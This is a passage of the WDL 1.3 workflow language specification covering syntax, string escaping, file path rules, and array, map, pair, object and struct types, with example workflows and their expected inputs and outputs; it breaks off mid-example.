Workflow Description Language (WDL)
January 12, 2026 ยท View on GitHub
This is version 1.3.0 of the Workflow Description Language (WDL) specification. It describes WDL version 1.3. It introduces a number of new features (denoted by the โจ symbol) and clarifications to the 1.2.* version of the specification. For an execution engine to be considered compliant with WDL 1.3, you must pass 100% of the compliance tests using spectool.
Deprecations
Aspects of the specification that will be removed in the next major WDL version are denoted by the ๐ symbol.
Revisions
Revisions to this specification are made periodically in order to correct errors, clarify language, or add additional examples. Revisions are released as "patches" to the specification, i.e., the third number in the specification version is incremented. No functionality is added or removed after the initial revision of the specification is ratified.
- 1.3.0: 2026-01-12
Table of Contents
- Workflow Description Language (WDL)
- WDL Language Specification
- Global Grammar Rules
- Whitespace
- Comments
- Reserved Keywords
- Literals
- Types
- Declarations
- Expressions
- Static Analysis and Dynamic Evaluation
- WDL Documents
- Versioning
- Struct Definition
- Enum Definition
- Import Statements
- Task Definition
- Workflow Definition
- Global Grammar Rules
- Standard Library
- Input and Output Formats
- Appendix A: WDL Value Serialization and Deserialization
- Appendix B: WDL Namespaces and Scopes
- Appendix C: Example Data
Introduction
Workflow Description Language (WDL) is an open, standardized, human readable and writable language for expressing tasks and workflows. WDL is designed to be a general-purpose workflow language, but it is most widely used in the field of bioinformatics. There is a large community of WDL users who share their workflows and tasks on sites such as Dockstore.
This document provides a detailed technical specification for WDL. Users who are new to WDL may appreciate a more gentle introduction, such as the learn-wdl repository.
Here is provided a short example of WDL, after which are several sections that provide the necessary details both for WDL users and for implementers of WDL execution engines:
- Language Specification: a description of the WDL grammar and all the parts of the WDL document.
- Standard Library: a catalog of the functions available to be called from within a WDL document.
- Input and Output Formats: a description of the standard input and output formats that must be supported by all WDL implementations.
- Appendices: Sections with more detailed information about various parts of the specification.
An Example WDL Workflow
Below is the code for the "Hello World" workflow in WDL. This is just meant to give a flavor of WDL syntax and capabilities - all WDL elements are described in detail in the Language Specification.
Example: hello.wdl
version 1.3
task hello_task {
input {
File infile
String pattern
}
command <<<
grep -E '~{pattern}' '~{infile}'
>>>
requirements {
container: "ubuntu:latest"
}
output {
Array[String] matches = read_lines(stdout())
}
}
workflow hello {
input {
File infile
String pattern
}
call hello_task {
infile, pattern
}
output {
Array[String] matches = hello_task.matches
}
}
version 1.3
task hello_task {
input {
File infile
String pattern
}
command <<<
grep -E '~{pattern}' '~{infile}'
>>>
requirements {
container: "ubuntu:latest"
}
output {
Array[String] matches = read_lines(stdout())
}
}
workflow hello {
input {
File infile
String pattern
}
call hello_task {
infile, pattern
}
output {
Array[String] matches = hello_task.matches
}
}
Example input:
{
"hello.infile": "data/greetings.txt",
"hello.pattern": "hello.*"
}
Example output:
{
"hello.matches": ["hello world", "hello nurse"]
}
Note: you can click the arrow next to the name of any example to expand it and see supplementary information, such as example inputs and outputs.
This WDL document describes a task, called hello_task, and a workflow, called hello.
- A task encapsulates a Bash script and a UNIX environment and presents them as a reusable function.
- A workflow encapsulates a (directed, acyclic) graph of task calls that transforms input data to the desired outputs.
Both workflows and tasks can accept input parameters and produce outputs. For example, workflow hello has two input parameters, File infile and String pattern, and one output parameter, Array[String] matches. This simple workflow calls task hello_task, passing through the workflow inputs to the task inputs, and using the results of call hello_task as the workflow output.
Executing a WDL Workflow
To execute this workflow, a WDL execution engine must be used (sometimes called the "WDL runtime" or "WDL implementation"). Some popular WDL execution engines are listed in the README.
Along with the WDL file, the user must provide the execution engine with values for the two input parameters. While implementations may provide their own mechanisms for launching workflows, all implementations minimally accept inputs as JSON format, which requires that the input arguments be fully qualified according to the namespacing rules described in the Fully Qualified Names & Namespaced Identifiers section. For example:
| Variable | Value |
|---|---|
| hello.pattern | hello.* |
| hello.infile | greetings.txt |
Running the hello workflow with these inputs would yield the following command line from the call to hello_task:
grep -E 'hello.*' 'greetings.txt'
Advanced WDL Features
WDL also provides features for implementing more complex workflows. For example, hello_task introduced in the previous example can be called in parallel across many different input files using the well-known scatter-gather pattern:
Example: hello_parallel.wdl
version 1.3
import "hello.wdl"
workflow hello_parallel {
input {
Array[File] files
String pattern
}
scatter (path in files) {
call hello.hello_task {
infile = path,
pattern = pattern
}
}
output {
# WDL implicitly implements the 'gather' step, so the output of
# a scatter is always an array with the elements in the same
# order as the input array. Since hello_task.matches is an array,
# all the results will be gathered into an array-of-arrays.
Array[Array[String]] all_matches = hello_task.matches
}
}
version 1.3
import "hello.wdl"
workflow hello_parallel {
input {
Array[File] files
String pattern
}
scatter (path in files) {
call hello.hello_task {
infile = path,
pattern = pattern
}
}
output {
# WDL implicitly implements the 'gather' step, so the output of
# a scatter is always an array with the elements in the same
# order as the input array. Since hello_task.matches is an array,
# all the results will be gathered into an array-of-arrays.
Array[Array[String]] all_matches = hello_task.matches
}
}
Example input:
{
"hello_parallel.pattern": "^[a-z_]+$",
"hello_parallel.files": ["data/greetings.txt", "data/hello.txt"]
}
Example output:
{
"hello_parallel.all_matches": [["hi_world"], ["hello"]]
}
WDL Language Specification
Global Grammar Rules
WDL files are encoded in UTF-8, with no byte order mark (BOM).
Whitespace
Whitespace may be used anywhere in a WDL document. Whitespace has no meaning in WDL, and is effectively ignored.
The following characters are treated as whitespace:
| Name | Dec | Hex |
|---|---|---|
| Space | 32 | \x20 |
| Tab | 9 | \x09 |
| CR | 13 | \x0D |
| LF | 10 | \x0A |
Comments
Comments can be used to provide helpful information such as workflow usage, requirements, copyright, etc. A comment is prepended by # and can be placed at the start of a line or at the end of any line of WDL code. Any text following the # will be completely ignored by the execution engine, with one exception: within the command section, ALL text will be included in the evaluated script - even lines prepended by #.
There is no special syntax for multi-line comments - simply use a # at the start of each line.
Example: workflow_with_comments.wdl
# Comments are allowed before version
version 1.3
# This is how you
# write a long
# multiline
# comment
task task_with_comments {
input {
Int number # This comment comes after a variable declaration
}
# This comment will not be included within the command
command <<<
# This comment WILL be included within the command after it has been parsed
echo ~{number * 2}
>>>
output {
Int result = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
workflow workflow_with_comments {
input {
Int number
}
# You can have comments anywhere in the workflow
call task_with_comments { number }
output { # You can also put comments after braces
Int result = task_with_comments.result
}
}
# Comments are allowed before version
version 1.3
# This is how you
# write a long
# multiline
# comment
task task_with_comments {
input {
Int number # This comment comes after a variable declaration
}
# This comment will not be included within the command
command <<<
# This comment WILL be included within the command after it has been parsed
echo ~{number * 2}
>>>
output {
Int result = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
workflow workflow_with_comments {
input {
Int number
}
# You can have comments anywhere in the workflow
call task_with_comments { number }
output { # You can also put comments after braces
Int result = task_with_comments.result
}
}
Example input:
{
"workflow_with_comments.number": 1
}
Example output:
{
"workflow_with_comments.result": 2
}
Reserved Keywords
The following (case-sensitive) language keywords are reserved and cannot be used to name declarations, calls, tasks, workflows, import namespaces, struct types, or aliases.
Array
Boolean
Directory
File
Float
Int
Map
None
Object
Pair
String
alias
as
call
command
else
enum
false
hints
if
in
import
input
left
meta
object
output
parameter_meta
right
requirements
runtime
scatter
struct
task
then
true
version
workflow
Literals
Task and workflow inputs may be passed in from an external source, or they may be specified in the WDL document itself using literal values. Input, output, and other declaration values may also be constructed at runtime using expressions that consist of literals, identifiers (references to declarations or call outputs), built-in operators, and standard library functions.
Types
A declaration is a name that the user reserves in a given scope to hold a value of a certain type. In WDL all declarations (including inputs and outputs) must be typed. This means that the information about the type of data that may be held by each declarations must be specified explicitly.
In WDL all types represent immutable values. For example, a File represents a logical "snapshot" of the file at the time when the value was created. It is impossible for a task to change an upstream value that has been provided as an input - even if it modifies its local copy, the original value is unaffected.
Primitive Types
The following primitive types exist in WDL:
- A
Booleanrepresents a value oftrueorfalse. - An
Intrepresents a signed 64-bit integer (in the range[-$2^{63}$, $2^{63}$)). - A
Floatrepresents a finite 64-bit IEEE-754 floating point number. - A
Stringrepresents a unicode character string following the format described below. - A
Filerepresents a file (or file-like object). - A
Directoryrepresents a (possibly nested) directory of files (as of version 1.2).
Example: primitive_literals.wdl
version 1.3
task write_file_task {
command <<<
mkdir -p testdir
printf "hello" > testdir/hello.txt
>>>
output {
File x = "testdir/hello.txt"
Directory d = "testdir"
}
}
workflow primitive_literals {
call write_file_task
output {
Boolean b = true
Int i = 0
Float f = 27.3
String s = "hello, world"
File x = write_file_task.x
Directory d = write_file_task.d
}
}
version 1.3
task write_file_task {
command <<<
mkdir -p testdir
printf "hello" > testdir/hello.txt
>>>
output {
File x = "testdir/hello.txt"
Directory d = "testdir"
}
}
workflow primitive_literals {
call write_file_task
output {
Boolean b = true
Int i = 0
Float f = 27.3
String s = "hello, world"
File x = write_file_task.x
Directory d = write_file_task.d
}
}
Example input:
{}
Example output:
{
"primitive_literals.b": true,
"primitive_literals.i": 0,
"primitive_literals.f": 27.3,
"primitive_literals.s": "hello, world",
"primitive_literals.x": "hello.txt",
"primitive_literals.d": "testdir"
}
Strings
A string literal may contain any unicode characters between single or double-quotes, with the exception of a few special characters that must be escaped:
| Escape Sequence | Meaning | \x Equivalent | Context |
|---|---|---|---|
\\ | \ | \x5C | |
\n | newline | \x0A | |
\t | tab | \x09 | |
\' | single quote | \x22 | within a single-quoted string |
\" | double quote | \x27 | within a double-quoted string |
\~ | tilde | \x7E | literal "~{" |
\$ | dollar sign | \x24 | literal "${" |
Strings can also contain the following types of escape sequences:
- An octal escape code starts with
\, followed by 3 digits of value 0 through 7 inclusive. - A hexadecimal escape code starts with
\x, followed by 2 hexadecimal digits0-9a-fA-F. - A unicode code point starts with
\ufollowed by 4 hexadecimal characters or\Ufollowed by 8 hexadecimal characters0-9a-fA-F.
Multi-line Strings
Strings that begin with <<< and end with >>> may span multiple lines.
Example: multiline_strings1.wdl
version 1.3
workflow multiline_strings1 {
output {
String s = <<<
This is a
multi-line string!
>>>
}
}
version 1.3
workflow multiline_strings1 {
output {
String s = <<<
This is a
multi-line string!
>>>
}
}
Example input:
{}
Example output:
{
"multiline_strings1.s": "This is a\nmulti-line string!"
}
In multi-line strings, leading whitespace is removed according to the following rules. In the context of multi-line strings, whitespace refers to space (\x20) and tab characters only and is treated differently from newline characters.
- Remove all line continuations and subsequent white space.
- A line continuation is a backslash (
\) immediately preceding the newline. A line continuation indicates that two consecutive lines are actually the same line (e.g. when breaking a long line for better readability). - If a line ends in multiple
\then standard character escaping applies. Each pair of consecutive backslashes (\\) is an escaped backslash. So a line is continued only if it ends in an odd number of backslashes. - Removing a line continuation means removing the last
\character, the immediately following newline, and all the whitespace preceeding the next non-whitespace character or end of line (whichever comes first).
- A line continuation is a backslash (
- Remove all whitespace following the opening
<<<, up to and including a newline (if any). - Remove all whitespace preceeding the closing
>>>, up to and including a newline (if any). - Use all remaining non-blank lines to determine the common leading whitespace.
- A blank line contains zero or more whitespace characters followed by a newline.
- Common leading whitespace is the minimum number of whitespace characters occuring before the first non-whitespace character in a non-blank line.
- Each whitespace character is counted once regardless of whether it is a space or tab (so care should be taken when mixing whitespace characters).
- Remove common leading whitespace from each line.
Example: multiline_strings2.wdl
version 1.3
workflow multiline_strings2 {
output {
# all of these strings evaluate to "hello world"
String hw0 = "hello world"
String hw1 = <<<hello world>>>
String hw2 = <<< hello world >>>
String hw3 = <<<
hello world>>>
String hw4 = <<<
hello world
>>>
String hw5 = <<<
hello world
>>>
# The line continuation causes the newline and all whitespace preceding 'world' to be
# removed - to put two spaces between 'hello' and world' we need to put them before
# the line continuation.
String hw6 = <<<
hello \
world
>>>
# This string is not equivalent - the first line ends in two backslashes, which is an
# escaped backslash, not a line continuation. So this string evaluates to
# "hello \\\n world".
String not_equivalent = <<<
hello \\
world
>>>
}
}
version 1.3
workflow multiline_strings2 {
output {
# all of these strings evaluate to "hello world"
String hw0 = "hello world"
String hw1 = <<<hello world>>>
String hw2 = <<< hello world >>>
String hw3 = <<<
hello world>>>
String hw4 = <<<
hello world
>>>
String hw5 = <<<
hello world
>>>
# The line continuation causes the newline and all whitespace preceding 'world' to be
# removed - to put two spaces between 'hello' and world' we need to put them before
# the line continuation.
String hw6 = <<<
hello \
world
>>>
# This string is not equivalent - the first line ends in two backslashes, which is an
# escaped backslash, not a line continuation. So this string evaluates to
# "hello \\\n world".
String not_equivalent = <<<
hello \\
world
>>>
}
}
Example input:
{}
Example output:
{
"multiline_strings2.hw0": "hello world",
"multiline_strings2.hw1": "hello world",
"multiline_strings2.hw2": "hello world",
"multiline_strings2.hw3": "hello world",
"multiline_strings2.hw4": "hello world",
"multiline_strings2.hw5": "hello world",
"multiline_strings2.hw6": "hello world",
"multiline_strings2.not_equivalent": "hello \\\n world"
}
Common leading whitespace is also removed from blank lines that contain whitespace characters; newlines are not removed from blank lines. This means blank lines may be used to ensure that a multi-line string begins/ends with a newline.
Example: multiline_strings3.wdl
version 1.3
workflow multiline_strings3 {
output {
# These strings are all equivalent. In strings B, C, and D, the middle lines are blank and
# so do not count towards the common leading whitespace determination.
String multi_line_A = "\nthis is a\n\n multi-line string\n"
# This string's common leading whitespace is 0.
String multi_line_B = <<<
this is a
multi-line string
>>>
# This string's common leading whitespace is 2. The middle blank line contains two spaces
# that are also removed.
String multi_line_C = <<<
this is a
multi-line string
>>>
# This string's common leading whitespace is 8.
String multi_line_D = <<<
this is a
multi-line string
>>>
}
}
version 1.3
workflow multiline_strings3 {
output {
# These strings are all equivalent. In strings B, C, and D, the middle lines are blank and
# so do not count towards the common leading whitespace determination.
String multi_line_A = "\nthis is a\n\n multi-line string\n"
# This string's common leading whitespace is 0.
String multi_line_B = <<<
this is a
multi-line string
>>>
# This string's common leading whitespace is 2. The middle blank line contains two spaces
# that are also removed.
String multi_line_C = <<<
this is a
multi-line string
>>>
# This string's common leading whitespace is 8.
String multi_line_D = <<<
this is a
multi-line string
>>>
}
}
Example input:
{}
Example output:
{
"multiline_strings3.multi_line_A": "\nthis is a\n\n multi-line string\n",
"multiline_strings3.multi_line_B": "\nthis is a\n\n multi-line string\n",
"multiline_strings3.multi_line_C": "\nthis is a\n\n multi-line string\n",
"multiline_strings3.multi_line_D": "\nthis is a\n\n multi-line string\n"
}
Single- and double-quotes do not need to be escaped within a multi-line string.
Example: multiline_strings4.wdl
version 1.3
workflow multiline_strings4 {
output {
String multi_line_with_quotes = <<<
multi-line string \
with 'single' and "double" quotes
>>>
}
}
version 1.3
workflow multiline_strings4 {
output {
String multi_line_with_quotes = <<<
multi-line string \
with 'single' and "double" quotes
>>>
}
}
Example input:
{}
Example output:
{
"multiline_strings4.multi_line_with_quotes": "multi-line string with 'single' and \"double\" quotes"
}
Files and Directories
A File or Directory declaration may have have a string value indicating a relative or absolute path on the local file system.
Path Canonicalization and Validation
When a File or Directory value is created, the following operations are performed:
- Path Canonicalization. Intermediate path components are normalized (resolving
.for current directory and..for parent directory segments), symbolic links are resolved to their final targets, and relative paths are converted to their absolute path form. ForDirectoryvalues, trailing directory separators are removed. - Path Validation. The path must exist at value creation time. If the path does not exist, an error occurs immediately. The file/directory must accessible for reading (i.e., assigned the appropriate permissions). Additionally, a
Filevalue cannot refer to a directory; if the path refers to a directory, an error occurs. Similarly, aDirectoryvalue cannot refer to a file; if the path refers to a file, an error occurs.
Value creation occurs when the value is materialized as a File/Directory within the execution engine, including
- When a
FileorDirectorydeclaration is evaluated - When a
Stringis coerced to aFileorDirectorytype
After canonicalization, two File or Directory values that refer to the same underlying resource are considered equal for all comparison operations, even if they were initialized from different string representations.
task literals_paths {
input {
File f1 = "/foo/bar.txt"
File? f2
}
# If baz.txt does not exist, this is an error.
File f3 = "baz.txt"
# If qux.txt does not exist, this is set to `None`.
File? f4 = "qux.txt"
command <<<
# If the user does not overide the value of `f1`, and /foo/bar.txt
# does not exist, an error will occur when the `File` value is created.
cat "~{f1}"
# If the user does not specify the value of `f2` it's value is `None`,
# which results in the empty-string when interpolated. `-f ""` is
# always false.
if [ -f "~{f2}" ]; then
echo "~{f2}"
fi
}
Within a WDL file, the execution engine is only required to support literal values for files and directories that are paths local to the execution environment.
During task execution, the following additional constraints apply:
- To write to a file, the path's parent directory must be accessible for writing.
- To write to a directory, it must exist and be accessible for writing.
An execution engine may support other ways to specify File and Directory inputs (e.g., as URIs), but prior to task execution it must localize inputs so that the runtime value of a File/Directory variable is a local path. Remote files must be treated as read-only. For remote files, localization occurs as part of value creationโthe remote file must be accessible and valid when the File or Directory value is evaluated, at which point it is localized and the resulting local path is validated according to the rules above.
Relative and Absolute Paths
The interpretation of relative paths (paths that do not start with /) depends on the context in which they appear:
- Outside the
outputsection (e.g., ininputor private declarations), relative paths are interpreted relative to the parent directory of the WDL document itself on the host filesystem, similar to how import paths are resolved. - Inside the
outputsection, relative paths are interpreted relative to the task's execution directory. This is where task commands create their output files. See Task Outputs for details.
In both contexts, if an optional File? or Directory? declaration refers to a path that does not exist, the value is set to None.
Absolute paths (paths starting with /) refer to specific locations on the host filesystem when used outside the output section. Within the output section, absolute paths may be interpreted in a container-dependent wayโsee Task Outputs for details.
Example: relative_paths_context.wdl
version 1.3
task relative_paths_context {
# This relative path is resolved relative to the WDL document's parent directory.
File input_file = "data/hello.txt"
command <<<
cat ~{input_file} > output.txt
>>>
output {
# This relative path is resolved relative to the execution directory.
File result = "output.txt"
String content = read_string(result)
}
}
version 1.3
task relative_paths_context {
# This relative path is resolved relative to the WDL document's parent directory.
File input_file = "data/hello.txt"
command <<<
cat ~{input_file} > output.txt
>>>
output {
# This relative path is resolved relative to the execution directory.
File result = "output.txt"
String content = read_string(result)
}
}
Example input:
{}
Example output:
{
"relative_paths_context.result": "hello.txt"
"relative_paths_context.content": "hello"
}
Test config:
{
"exclude_outputs": ["result"]
}
In this example,
- The
input_fileinput uses a relative path that refers to a file co-located with the WDL document on the host filesystem. - The
resultoutput uses a relative path that refers to a file created by the command in the execution directory.
Optional Types and None
A type may have a ? postfix quantifier, which means that its value is allowed to be undefined without causing an error. A declaration with an optional type can only be used in calls or functions that accept optional values.
Multi-level optionals are not allowed. A value cannot have multiple levels of optionality, for example, Int?? is not a valid type. However, nested optionals within compound types are allowed, such as Array[String?]?, where each ? applies to a different structural level of the type.
WDL has a special value None whose meaning is "an undefined value". The None value has the (hidden) type Union, meaning None can be assigned to an optional declaration of any type.
An optional declaration has a default initialization of None, which indicates that it is undefined. An optional declaration may be initialized to any literal or expression of the correct type, including the special None value.
Example: optionals.wdl
version 1.3
workflow optionals {
input {
Int certainly_five = 5 # an non-optional declaration
Int? maybe_five_and_is = 5 # a defined optional declaration
# the following are equivalent undefined optional declarations
String? maybe_five_but_is_not
String? also_maybe_five_but_is_not = None
}
output {
Boolean test_defined = defined(maybe_five_but_is_not) # Evaluates to false
Boolean test_defined2 = defined(maybe_five_and_is) # Evaluates to true
Boolean test_is_none = maybe_five_but_is_not == None # Evaluates to true
Boolean test_not_none = maybe_five_but_is_not != None # Evaluates to false
Boolean test_non_equal = maybe_five_but_is_not == also_maybe_five_but_is_not
}
}
version 1.3
workflow optionals {
input {
Int certainly_five = 5 # an non-optional declaration
Int? maybe_five_and_is = 5 # a defined optional declaration
# the following are equivalent undefined optional declarations
String? maybe_five_but_is_not
String? also_maybe_five_but_is_not = None
}
output {
Boolean test_defined = defined(maybe_five_but_is_not) # Evaluates to false
Boolean test_defined2 = defined(maybe_five_and_is) # Evaluates to true
Boolean test_is_none = maybe_five_but_is_not == None # Evaluates to true
Boolean test_not_none = maybe_five_but_is_not != None # Evaluates to false
Boolean test_non_equal = maybe_five_but_is_not == also_maybe_five_but_is_not
}
}
Example input:
{}
Example output:
{
"optionals.test_defined": false,
"optionals.test_defined2": true,
"optionals.test_is_none": true,
"optionals.test_not_none": false,
"optionals.test_non_equal": true
}
For more details, see the sections on Input Type Constraints and Optional Inputs with Defaults.
Compound Types
A compound type is one that contains nested types, i.e. it is parameterized by other types. The following compound types can be constructed. In the examples below P represents any of the primitive types above, and X and Y represent any valid type (including nested compound types).
Array[X]
An Array represents an ordered list of elements that are all of the same type. An array is insertion ordered, meaning the order in which elements are added to the Array is preserved.
An array value can be initialized with an array literal - a comma-separated list of values in brackets ([]). A specific zero-based index of an Array can be accessed by placing the index in brackets after the declaration name. Accessing a non-existent index of an Array results in an error.
Example: array_access.wdl
version 1.3
workflow array_access {
input {
Array[String] strings
Int index
}
output {
String s = strings[index]
}
}
version 1.3
workflow array_access {
input {
Array[String] strings
Int index
}
output {
String s = strings[index]
}
}
Example input:
{
"array_access.strings": ["hello", "world"],
"array_access.index": 0
}
Example output:
{
"array_access.s": "hello"
}
Example: empty_array_fail.wdl
version 1.3
workflow empty_array_fail {
Array[Int] empty = []
output {
# this causes an error - trying to access a non-existent array element
Int i = empty[0]
}
}
version 1.3
workflow empty_array_fail {
Array[Int] empty = []
output {
# this causes an error - trying to access a non-existent array element
Int i = empty[0]
}
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
An Array may have an empty value (i.e. an array of length zero), unless it is declared using +, the non-empty postfix quantifier, which represents a constraint that the Array value must contain one-or-more elements. For example, the following task operates on an Array of Strings and it requires at least one string to function:
Example: sum_task.wdl
version 1.3
task sum {
input {
Array[String]+ ints
}
command <<<
printf "~{sep(" ", ints)}" | awk '{tot=0; for(i=1;i<=NF;i++) tot+=$i; print tot}'
>>>
output {
Int total = read_int(stdout())
}
}
version 1.3
task sum {
input {
Array[String]+ ints
}
command <<<
printf "~{sep(" ", ints)}" | awk '{tot=0; for(i=1;i<=NF;i++) tot+=$i; print tot}'
>>>
output {
Int total = read_int(stdout())
}
}
Example input:
{
"sum.ints": ["0", "1", "2"]
}
Example output:
{
"sum.total": 3
}
Recall that a type may have an optional postfix quantifier (?), which means that its value may be undefined. The + and ? postfix quantifiers can be combined to declare an Array that is either undefined or non-empty, i.e. it can have any value except the empty array.
Attempting to assign an empty array literal to a non-empty Array declaration results in an error. Otherwise, the non-empty assertion is only checked at runtime: binding an empty array to an Array[T]+ input or function argument is a runtime error.
Example: non_empty_optional.wdl
version 1.3
workflow non_empty_optional {
output {
# array that must contain at least one Float
Array[Float]+ nonempty1 = [0.0]
# array that must contain at least one Int? (which may have an undefined value)
Array[Int?]+ nonempty2 = [None, 1]
# array that can be undefined or must contain at least one Int
Array[Int]+? nonempty3 = None
Array[Int]+? nonempty4 = [0]
}
}
version 1.3
workflow non_empty_optional {
output {
# array that must contain at least one Float
Array[Float]+ nonempty1 = [0.0]
# array that must contain at least one Int? (which may have an undefined value)
Array[Int?]+ nonempty2 = [None, 1]
# array that can be undefined or must contain at least one Int
Array[Int]+? nonempty3 = None
Array[Int]+? nonempty4 = [0]
}
}
Example input:
{}
Example output:
{
"non_empty_optional.nonempty1": [0.0],
"non_empty_optional.nonempty2": [null, 1],
"non_empty_optional.nonempty3": null,
"non_empty_optional.nonempty4": [0]
}
Example: non_empty_optional_fail.wdl
version 1.3
workflow non_empty_optional_fail {
# these both cause an error - can't assign empty array value to non-empty Array type
Array[Boolean]+ nonempty3 = []
Array[Int]+? nonempty6 = []
}
version 1.3
workflow non_empty_optional_fail {
# these both cause an error - can't assign empty array value to non-empty Array type
Array[Boolean]+ nonempty3 = []
Array[Int]+? nonempty6 = []
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
For more details see the section on Input Type Constraints.
Pair[X, Y]
A Pair represents two associated values, which may be of different types. In other programming languages, a Pair might be called a "two-tuple".
A Pair can be initialized with a pair literal - a comma-separated pair of values in parentheses (()). The components of a Pair value are accessed using its left and right accessors.
Example: test_pairs.wdl
version 1.3
workflow test_pairs {
Pair[Int, Array[String]] data = (5, ["hello", "goodbye"])
output {
Int five = data.left # evaluates to 5
String hello = data.right[0] # evaluates to "hello"
}
}
version 1.3
workflow test_pairs {
Pair[Int, Array[String]] data = (5, ["hello", "goodbye"])
output {
Int five = data.left # evaluates to 5
String hello = data.right[0] # evaluates to "hello"
}
}
Example input:
{}
Example output:
{
"test_pairs.five": 5,
"test_pairs.hello": "hello"
}
Map[P, Y]
A Map represents an associative array of key-value pairs. All of the keys must be of the same (primitive) type, and all of the values must be of the same type, but keys and values can be different types.
A Map can be initialized with a map literal - a comma-separated list of key-value pairs in braces ({}), where key-value pairs are delimited by :. The value of a specific key can be accessed by placing the key in brackets after the declaration name. Accessing a non-existent key of a Map results in an error.
Example: test_map.wdl
version 1.3
workflow test_map {
Map[Int, Int] int_to_int = {1: 10, 2: 11}
Map[String, Int] string_to_int = { "a": 1, "b": 2 }
Map[File, Array[Int]] file_to_ints = {
"data/cities.txt": [0, 1, 2],
"data/hello.txt": [9, 8, 7]
}
output {
Int ten = int_to_int[1] # evaluates to 10
Int b = string_to_int["b"] # evaluates to 2
Array[Int] ints = file_to_ints["data/cities.txt"] # evaluates to [0, 1, 2]
}
}
version 1.3
workflow test_map {
Map[Int, Int] int_to_int = {1: 10, 2: 11}
Map[String, Int] string_to_int = { "a": 1, "b": 2 }
Map[File, Array[Int]] file_to_ints = {
"data/cities.txt": [0, 1, 2],
"data/hello.txt": [9, 8, 7]
}
output {
Int ten = int_to_int[1] # evaluates to 10
Int b = string_to_int["b"] # evaluates to 2
Array[Int] ints = file_to_ints["data/cities.txt"] # evaluates to [0, 1, 2]
}
}
Example input:
{}
Example output:
{
"test_map.ten": 10,
"test_map.b": 2,
"test_map.ints": [0, 1, 2]
}
Example: test_map_fail.wdl
version 1.3
workflow test_map_fail {
Map[String, Int] string_to_int = { "a": 1, "b": 2 }
Int c = string_to_int["c"] # error - "c" is not a key in the map
}
version 1.3
workflow test_map_fail {
Map[String, Int] string_to_int = { "a": 1, "b": 2 }
Int c = string_to_int["c"] # error - "c" is not a key in the map
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
A Map is insertion-ordered, meaning the order in which elements are added to the Map is preserved, for example when converting a Map to an array of Pairs.
Example: test_map_ordering.wdl
version 1.3
workflow test_map_ordering {
# declaration using a map literal
Map[Int, Int] int_to_int = { 2: 5, 1: 10 }
scatter (ints in as_pairs(int_to_int)) {
Array[Int] i = [ints.left, ints.right]
}
output {
# evaluates to [[2, 5], [1, 10]]
Array[Array[Int]] ints = i
}
}
version 1.3
workflow test_map_ordering {
# declaration using a map literal
Map[Int, Int] int_to_int = { 2: 5, 1: 10 }
scatter (ints in as_pairs(int_to_int)) {
Array[Int] i = [ints.left, ints.right]
}
output {
# evaluates to [[2, 5], [1, 10]]
Array[Array[Int]] ints = i
}
}
Example input:
{}
Example output:
{
"test_map_ordering.ints": [[2, 5], [1, 10]]
}
๐ Object
An Object is an unordered associative array of name-value pairs, where values may be of any type and are not defined explicitly.
An Object can be initialized using an object literal value, which begins with the object keyword followed by a comma-separated list of name-value pairs in braces ({}), where name-value pairs are delimited by :. The member names in an object literal are not quoted. The value of a specific member of an Object value can be accessed by placing a . followed by the member name after the identifier.
Example: test_object.wdl
version 1.3
workflow test_object {
output {
Object obj = object {
a: 10,
b: "hello"
}
Int i = obj.a
}
}
version 1.3
workflow test_object {
output {
Object obj = object {
a: 10,
b: "hello"
}
Int i = obj.a
}
}
Example input:
{}
Example output:
{
"test_object.obj": {
"a": 10,
"b": "hello"
},
"test_object.i": 10
}
Due to the lack of explicitness in the typing of Object being at odds with the goal of being able to know the type information of all WDL declarations, the use of the Object type and the object literal syntax have been deprecated. In WDL 2.0, Object will become a hidden type that may only be instantiated by the execution engine. Object declarations can be replaced with use of structs.
Custom Types (Structs)
WDL provides the ability to define custom compound types called structs. Struct types are defined at the top-level of the WDL document and are usable like any other type. A struct is defined using the struct keyword, followed by a unique name, followed by member declarations within braces. A struct definition contains any number of declarations of any types, including other Structs.
A declaration with a custom type can be initialized with a struct literal, which begins with the Struct type name followed by a comma-separated list of name-value pairs in braces ({}), where name-value pairs are delimited by :. The member names in a struct literal are not quoted. A struct literal must provide values for all of the struct's non-optional members, and may provide values for any of the optional members. The members of a struct literal are validated against the struct's definition at the time of creation. Members do not need to be in any specific order. Once a struct literal is created, it is immutable like any other WDL value.
The value of a specific member of a struct value can be accessed by placing a . followed by the member name after the identifier.
Example: test_struct.wdl
version 1.3
struct BankAccount {
String account_number
Int routing_number
Float balance
Array[Int]+ pin_digits
String? username
}
struct Person {
String name
BankAccount? account
}
workflow test_struct {
output {
Person john = Person {
name: "John",
# it's okay to leave out username since it's optional
account: BankAccount {
account_number: "123456",
routing_number: 300211325,
balance: 3.50,
pin_digits: [1, 2, 3, 4]
}
}
Boolean has_account = defined(john.account)
}
}
version 1.3
struct BankAccount {
String account_number
Int routing_number
Float balance
Array[Int]+ pin_digits
String? username
}
struct Person {
String name
BankAccount? account
}
workflow test_struct {
output {
Person john = Person {
name: "John",
# it's okay to leave out username since it's optional
account: BankAccount {
account_number: "123456",
routing_number: 300211325,
balance: 3.50,
pin_digits: [1, 2, 3, 4]
}
}
Boolean has_account = defined(john.account)
}
}
Example input:
{}
Example output:
{
"test_struct.john": {
"name": "John",
"account": {
"account_number": "123456",
"routing_number": 300211325,
"balance": 3.5,
"pin_digits": [1, 2, 3, 4],
"username": null
}
},
"test_struct.has_account": true
}
Example: incomplete_struct_fail.wdl
version 1.3
# importing a WDL automatically imports all its structs into
# the current namespace
import "test_struct.wdl"
workflow incomplete_struct {
output {
# error! missing required account_number
Person fail1 = Person {
"name": "Sam",
"account": BankAccount {
routing_number: 611325474,
balance: 9.99,
pin_digits: [5, 5, 5, 5]
}
}
# error! pin_digits is empty
Person fail2 = Person {
"name": "Bugs",
"account": BankAccount {
account_number: "FATCAT42",
routing_number: 880521345,
balance: 50.01,
pin_digits: []
}
}
}
}
version 1.3
# importing a WDL automatically imports all its structs into
# the current namespace
import "test_struct.wdl"
workflow incomplete_struct {
output {
# error! missing required account_number
Person fail1 = Person {
"name": "Sam",
"account": BankAccount {
routing_number: 611325474,
balance: 9.99,
pin_digits: [5, 5, 5, 5]
}
}
# error! pin_digits is empty
Person fail2 = Person {
"name": "Bugs",
"account": BankAccount {
